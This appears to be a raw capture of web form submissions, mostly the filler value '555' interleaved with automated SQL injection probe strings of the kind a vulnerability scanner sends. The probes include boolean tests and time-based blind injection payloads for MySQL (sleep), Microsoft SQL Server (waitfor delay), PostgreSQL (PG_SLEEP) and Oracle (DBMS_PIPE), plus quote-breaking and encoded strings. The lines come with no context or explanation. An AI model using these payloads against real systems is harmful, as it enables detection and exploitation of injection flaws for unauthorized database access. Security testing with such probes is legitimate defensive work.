555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+325-325-1=0+0+0+1 --
555
555
-1 OR 3+325-325-1=0+0+0+1 --
555
555
-1 OR 3*2<(0+5+325-325) --
555
555
-1 OR 3*2>(0+5+325-325) --
555
555
-1 OR 2+251-251-1=0+0+0+1
555
555
-1 OR 3+251-251-1=0+0+0+1
555
555
-1 OR 3*2<(0+5+251-251)
555
555
-1 OR 3*2>(0+5+251-251)
555
555
-1' OR 2+167-167-1=0+0+0+1 --
555
555
-1' OR 3+167-167-1=0+0+0+1 --
555
555
-1' OR 3*2<(0+5+167-167) --
555
555
-1' OR 3*2>(0+5+167-167) --
555
555
-1' OR 2+605-605-1=0+0+0+1 or 'mSda0pl9'='
555
-1 OR 2+652-652-1=0+0+0+1 --
-1' OR 3+605-605-1=0+0+0+1 or 'mSda0pl9'='
555
-1 OR 3+652-652-1=0+0+0+1 --
-1' OR 3*2<(0+5+605-605) or 'mSda0pl9'='
555
-1 OR 3*2<(0+5+652-652) --
-1' OR 3*2>(0+5+605-605) or 'mSda0pl9'='
555
-1 OR 3*2>(0+5+652-652) --
-1" OR 2+959-959-1=0+0+0+1 --
555
-1 OR 2+116-116-1=0+0+0+1
-1" OR 3+959-959-1=0+0+0+1 --
555
-1 OR 3+116-116-1=0+0+0+1
-1" OR 3*2<(0+5+959-959) --
555
-1 OR 3*2<(0+5+116-116)
-1" OR 3*2>(0+5+959-959) --
555
-1 OR 3*2>(0+5+116-116)
555*if(now()=sysdate(),sleep(15),0)
555
-1' OR 2+370-370-1=0+0+0+1 --
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
-1' OR 3+370-370-1=0+0+0+1 --
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
-1' OR 3*2<(0+5+370-370) --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
-1' OR 3*2>(0+5+370-370) --
555-1; waitfor delay '0:0:15' --
555
-1' OR 2+353-353-1=0+0+0+1 or '0CCDWPGR'='
555-1); waitfor delay '0:0:15' --
555
-1' OR 3+353-353-1=0+0+0+1 or '0CCDWPGR'='
555-1)); waitfor delay '0:0:15' --
-1 OR 2+191-191-1=0+0+0+1 --
-1' OR 3*2<(0+5+353-353) or '0CCDWPGR'='
555-1 waitfor delay '0:0:15' --
-1 OR 3+191-191-1=0+0+0+1 --
-1' OR 3*2>(0+5+353-353) or '0CCDWPGR'='
555Ddg44j2k'; waitfor delay '0:0:15' --
-1 OR 3*2<(0+5+191-191) --
-1" OR 2+778-778-1=0+0+0+1 --
555MxtoQT8f'); waitfor delay '0:0:15' --
-1 OR 3*2>(0+5+191-191) --
-1" OR 3+778-778-1=0+0+0+1 --
555iBtph4Al')); waitfor delay '0:0:15' --
-1 OR 2+660-660-1=0+0+0+1
-1" OR 3*2<(0+5+778-778) --
555-1 OR 271=(SELECT 271 FROM PG_SLEEP(15))--
-1 OR 3+660-660-1=0+0+0+1
-1" OR 3*2>(0+5+778-778) --
555-1) OR 918=(SELECT 918 FROM PG_SLEEP(15))--
-1 OR 3*2<(0+5+660-660)
555*if(now()=sysdate(),sleep(15),0)
555-1)) OR 535=(SELECT 535 FROM PG_SLEEP(15))--
-1 OR 3*2>(0+5+660-660)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555lDLFSdUH' OR 545=(SELECT 545 FROM PG_SLEEP(15))--
-1' OR 2+597-597-1=0+0+0+1 --
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555JDjOMiQz') OR 531=(SELECT 531 FROM PG_SLEEP(15))--
-1' OR 3+597-597-1=0+0+0+1 --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555FBhC1iLD')) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
-1' OR 3*2<(0+5+597-597) --
555-1; waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-1' OR 3*2>(0+5+597-597) --
555-1); waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-1' OR 2+332-332-1=0+0+0+1 or 'gsIAMplJ'='
555-1)); waitfor delay '0:0:15' --
555
-1' OR 3+332-332-1=0+0+0+1 or 'gsIAMplJ'='
555-1 waitfor delay '0:0:15' --
555'"
-1' OR 3*2<(0+5+332-332) or 'gsIAMplJ'='
555zZ3ZQaOM'; waitfor delay '0:0:15' --
555ˤˢ%2527%2522\'\"
-1' OR 3*2>(0+5+332-332) or 'gsIAMplJ'='
555W3xB4IqE'); waitfor delay '0:0:15' --
@@nqv7g
-1" OR 2+356-356-1=0+0+0+1 --
555r1qNRU5d')); waitfor delay '0:0:15' --
555
-1" OR 3+356-356-1=0+0+0+1 --
555-1 OR 499=(SELECT 499 FROM PG_SLEEP(15))--
555
-1" OR 3*2<(0+5+356-356) --
555-1) OR 550=(SELECT 550 FROM PG_SLEEP(15))--
555
-1" OR 3*2>(0+5+356-356) --
555-1)) OR 935=(SELECT 935 FROM PG_SLEEP(15))--
555
555*if(now()=sysdate(),sleep(15),0)
5552cSOA7GQ' OR 204=(SELECT 204 FROM PG_SLEEP(15))--
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555Fan8blUG') OR 418=(SELECT 418 FROM PG_SLEEP(15))--
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555ps3yIUfU')) OR 882=(SELECT 882 FROM PG_SLEEP(15))--
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555-1; waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555-1); waitfor delay '0:0:15' --
555
555
555-1)); waitfor delay '0:0:15' --
555'"
555
555-1 waitfor delay '0:0:15' --
555ˤˢ%2527%2522\'\"
555
555RbrM9MMQ'; waitfor delay '0:0:15' --
@@OQ4zY
555
555yAjpKISn'); waitfor delay '0:0:15' --
555
555
555u6zt1Tlh')); waitfor delay '0:0:15' --
555
555
555-1 OR 401=(SELECT 401 FROM PG_SLEEP(15))--
555
555
555-1) OR 263=(SELECT 263 FROM PG_SLEEP(15))--
555
555
555-1)) OR 151=(SELECT 151 FROM PG_SLEEP(15))--
555
555
555WibcQVaP' OR 948=(SELECT 948 FROM PG_SLEEP(15))--
555
555
555RUNu4Ezo') OR 670=(SELECT 670 FROM PG_SLEEP(15))--
555
555
555yHhONOmL')) OR 965=(SELECT 965 FROM PG_SLEEP(15))--
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555
555
555
555'"
555
555
555ˤˢ%2527%2522\'\"
555
555
@@YleNr
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555